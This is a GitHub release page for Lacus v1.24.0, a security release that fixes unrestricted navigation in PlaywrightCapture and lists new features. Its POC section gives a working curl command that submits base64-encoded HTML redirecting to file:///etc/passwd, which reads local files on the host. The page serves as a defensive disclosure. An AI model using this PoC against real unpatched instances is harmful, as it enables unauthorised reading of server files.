Skip to content

v1.24.0

Choose a tag to compare

View all tags
@Rafiot Rafiot released this 30 Apr 14:48
· 25 commits to main since this release
v1.24.0
This tag was signed with the committer’s verified signature.
Rafiot Raphaël Vinot
GPG key ID: 32E4E1C133B3792F
Verified
Learn about vigilant mode.
b14d22a
This commit was signed with the committer’s verified signature.
Rafiot Raphaël Vinot
GPG key ID: 32E4E1C133B3792F
Verified
Learn about vigilant mode.

Important security release

PlaywrightCapture did not sufficiently restrict navigation and resource requests initiated by rendered pages. Find more details in the advisory: GHSA-687h-xw6f-q2qw

Please update any Lacus instance used to render untrusted pages (that's all of them 🙃).

POC

The call below was rendering /etc/passwd from the machine Lacus is running on. That applies to any file the user running lacus can read.

curl -s -X POST "http://<domain>/enqueue" -H "Content-Type: application/json" -d '{
 "document": "'$(echo '<html><body><script>window.location.href="file:///etc/passwd";</script></body></html>' | base64 -w0)'",
 "document_name": "test.html"
}'

The fix also blocks calls to non-global IPs that could be triggered by the rendered page.

Thank you very much to @jeroengui for the report and PoC.

New features

  • Add support for remote interactive headfull captures using xpra-html5. To use it, you need to install xpra (see readme).
    This feature should be considered beta at this stage and the API is subject to changes.
Screencast_20260430_163512.webm
  • Expose instance settings so a user knows what can be captured (tor, i2p) and how (headed, remote headed) and if the trusted timestamps are automatically generated.

Changes

  • Many improvement sin the logging system
  • Use latest playwright

What's Changed

New Contributors

Full Changelog: v1.23.0...v1.24.0

Contributors

DocArmoryTech and jeroengui
Assets 2
Loading